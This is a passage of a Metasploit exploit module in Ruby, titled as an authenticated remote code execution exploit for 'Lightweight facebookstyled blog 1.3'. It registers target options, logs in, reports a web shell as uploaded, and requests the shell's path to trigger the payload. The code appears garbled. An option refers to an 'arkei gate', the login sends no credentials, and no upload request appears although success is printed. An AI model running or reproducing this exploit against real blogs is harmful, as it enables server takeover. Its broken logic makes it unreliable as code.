register_options(
[
OptString.new('USERNAME', [true, 'Blog username', 'demo']),
OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])
]
)
end
def login
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
)
if res && res.code == 200
print_good("Successfully logged in with #{datastore['USERNAME']}")
json = res.get_json_document
if json.empty? && json['error']
print_error('Login failed!')
return nil, nil
end
else
print_error("Login failed! Status code #{res.code}")
return nil, nil
end
# print_status(res.to_s)
if res && res.code == 200
json = res.get_json_document
if json.empty? || !json['path']
fail_with(Failure::UnexpectedReply, 'Unexpected json response')
end
print_good("Shell uploaded as #{json['path']}")
else
print_error("Server responded with code #{res.code}")
print_error("Failed to upload shell")
return false
end
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, json['path'])}, 3
)
print_good("Payload successfully triggered !")
end
end
Lightweight facebookstyled blog 1.3 remote code execution (rce) (authenticated) (metasploit)